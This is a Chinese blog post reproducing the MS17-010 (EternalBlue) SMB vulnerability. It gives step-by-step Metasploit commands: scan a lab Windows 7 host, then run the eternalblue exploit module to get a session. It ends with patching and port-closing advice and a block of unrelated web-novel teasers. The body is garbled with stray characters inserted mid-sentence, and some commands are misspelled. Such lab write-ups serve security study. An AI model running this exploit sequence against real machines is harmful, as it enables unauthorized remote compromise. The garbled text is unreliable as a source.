【漏洞復(fù)現(xiàn)】那些年我們玩過(guò)的ms17-010(永恒之藍(lán))

簡(jiǎn)介

MS17-010(永恒之藍(lán))應(yīng)用的不僅僅是一個(gè)漏洞岁忘,而是包含Windows SMB? 遠(yuǎn)程代碼執(zhí)行漏洞CVE-2017-0143区匠、CVE-2017-0144、CVE-2017-0145麻汰、CVE-2017-0146戚篙、CVE-2017-0147岔擂、CVE-2017-0148在內(nèi)的6個(gè)SMB漏洞的攻擊。

當(dāng)我們?cè)谟胣amp掃除目標(biāo)主機(jī)開(kāi)放端口有445時(shí)乱灵,二話不說(shuō)就是上MS17-010。

測(cè)試漏洞

靶機(jī):未打過(guò)補(bǔ)丁的win7
打開(kāi)metasploit

第一步:search smb_ms17_010

第二步:use auxiliary/scanner/smb/smb_ms17_010?

第三步:set RHOSTS 10.10.10.26,然后輸入show options查看配置是否完成状原。

第四步:執(zhí)行exploit颠区,看到有攻擊的可能性。

然后直接上:

use exploit/windows/smb/ms17_010_eternalblue

set RHOSTS 10.10.10.26

explot

最后,假如目標(biāo)存在MS17-010漏洞,我們可以獲取到session:

修復(fù)方案

1蛹稍、為計(jì)算機(jī)安裝最新的安全補(bǔ)丁唆姐,微軟已發(fā)布補(bǔ)丁MS17-010修復(fù)了“永恒之藍(lán)”攻擊的系統(tǒng)漏洞廓八,網(wǎng)址為https://technet.microsoft.com/zh-cn/library/security/MS17-010剧蹂。

2宠叼、關(guān)閉445、135冒冬、137窄驹、138、139端口抗斤,關(guān)閉網(wǎng)絡(luò)共享丈咐。

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 人面猴
    序言:七十年代末棵逊,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子徒像,更是在濱河造成了極大的恐慌蛙讥,老刑警劉巖,帶你破解...
    沈念sama閱讀 218,640評(píng)論 6 507
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件旁涤,死亡現(xiàn)場(chǎng)離奇詭異,居然都是意外死亡瞳遍,警方通過(guò)查閱死者的電腦和手機(jī)菌羽,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,254評(píng)論 3 395
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門(mén),熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)份蝴,“玉大人氓轰,你說(shuō)我怎么就攤上這事“覆冢” “怎么了靴庆?”我有些...
    開(kāi)封第一講書(shū)人閱讀 165,011評(píng)論 0 355
  • 道士緝兇錄:失蹤的賣(mài)姜人
    文/不壞的土叔 我叫張陵奢讨,是天一觀的道長(zhǎng)。 經(jīng)常有香客問(wèn)我拿诸,道長(zhǎng)亩码,這世上最難降的妖魔是什么野瘦? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 58,755評(píng)論 1 294
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任,我火速辦了婚禮吏廉,結(jié)果婚禮上席覆,老公的妹妹穿的比我還像新娘啡省。我一直安慰自己,他們只是感情好畦戒,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,774評(píng)論 6 392
  • 惡毒庶女頂嫁案:這布局不是一般人想出來(lái)的
    文/花漫 我一把揭開(kāi)白布障斋。 她就那樣靜靜地躺著垃环,像睡著了一般返敬。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上涛目,一...
    開(kāi)封第一講書(shū)人閱讀 51,610評(píng)論 1 305
  • 城市分裂傳說(shuō)
    那天霹肝,我揣著相機(jī)與錄音,去河邊找鬼沫换。 笑死讯赏,一個(gè)胖子當(dāng)著我的面吹牛炭晒,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播网严,決...
    沈念sama閱讀 40,352評(píng)論 3 418
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開(kāi)眼怜庸,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼割疾!你這毒婦竟也來(lái)了嘉栓?” 一聲冷哼從身側(cè)響起拓诸,我...
    開(kāi)封第一講書(shū)人閱讀 39,257評(píng)論 0 276
  • 萬(wàn)榮殺人案實(shí)錄
    序言:老撾萬(wàn)榮一對(duì)情侶失蹤奠支,失蹤者是張志新(化名)和其女友劉穎倍谜,沒(méi)想到半個(gè)月后尔崔,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體褥民,經(jīng)...
    沈念sama閱讀 45,717評(píng)論 1 315
  • ?護(hù)林員之死
    正文 獨(dú)居荒郊野嶺守林人離奇死亡鹤盒,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,894評(píng)論 3 336
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年侦锯,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了秦驯。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片译隘。...
    茶點(diǎn)故事閱讀 40,021評(píng)論 1 350
  • 活死人
    序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖固耘,靈堂內(nèi)的尸體忽然破棺而出题篷,到底是詐尸還是另有隱情,我是刑警寧澤厅目,帶...
    沈念sama閱讀 35,735評(píng)論 5 346
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布番枚,位于F島的核電站,受9級(jí)特大地震影響损敷,放射性物質(zhì)發(fā)生泄漏葫笼。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,354評(píng)論 3 330
  • 男人毒藥:我在死后第九天來(lái)索命
    文/蒙蒙 一拗馒、第九天 我趴在偏房一處隱蔽的房頂上張望路星。 院中可真熱鬧,春花似錦诱桂、人聲如沸洋丐。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 31,936評(píng)論 0 22
  • 一樁弒父案,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)友绝。三九已至韩肝,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間哲泊,已是汗流浹背。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 33,054評(píng)論 1 270
  • 情欲美人皮
    我被黑心中介騙來(lái)泰國(guó)打工, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留喳魏,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 48,224評(píng)論 3 371
  • 代替公主和親
    正文 我出身青樓,卻偏偏與公主長(zhǎng)得像畦攘,于是被迫代替她去往敵國(guó)和親知押。 傳聞我的和親對(duì)象是個(gè)殘疾皇子朗徊,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,974評(píng)論 2 355

推薦閱讀更多精彩內(nèi)容